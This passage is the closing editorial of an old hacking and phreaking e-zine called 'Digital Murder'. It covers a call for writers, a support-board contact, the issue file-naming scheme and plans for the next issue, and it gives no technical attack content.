YOUR local phone Co. I'm sure they will appreciate hearing from their customers on a more technical level. Until next time, see you in the Funny Farm... ------------------------------------- ---------------- Heaven's Trash -Final Words from Morpheus ---------------- Thanks for reading Digital Murder. We welcome anyone that writes decent articles and believes in the free exchange of information to our staff. If you would like to write for DM then send us a letter or call one of our support boards. Right now our only support board is Backdoor @ 901.386.6455 but the list will grow very soon as I work out the details with other US SysOps. Here is the file-naming format we use to denote issue number and version of DM when spreading it to others on boards: ()-----Version Number: 40 - 40 col. version DM#00180 80 - 80 col. version Mag.name---() ^ 64 - C=64 prg. version !-------Issue Number Needless to say, the 40 and 80 col. versions are in ASCII while the 64 version is an ml coded version (in the works). I thought it would be a good idea to make different versions since phreaking and hacking is the same for all comp. types. The only version we have ignored is the 22 column version for Commodore Vic 20 users. If you are hacking and phreaking with one of those old relics and aren't clinicly insane yet then consider upgrading your system so you won't have to bug your friend to let you read DM every month on his system. If you plan on printing the mag out, you have probably already noticed that the pages are numbered, spaced out, etc. enjoy. You can find Digital Murder on most of the better boards in the United Socialist Republic of Amerika. Write us or leave email if you have ANY questions, comments, additional info on an article, new articles, etc. . . We will reply to all input we recieve either through mail (regular postal service or Email) or in the letters section of future issues of Digital Murder. Next issue will be out (hopefully Nov. 15th) just in time for Thanksgiving. Then you can thank me for giving up all my extra time I have, when I'm not busy with college or my girlfriend, to edit and publish yet another stodgy electronic magazine full of free information. Till next month or until Dan Quayle's IQ is higher than an AT&T manhole cover, so long.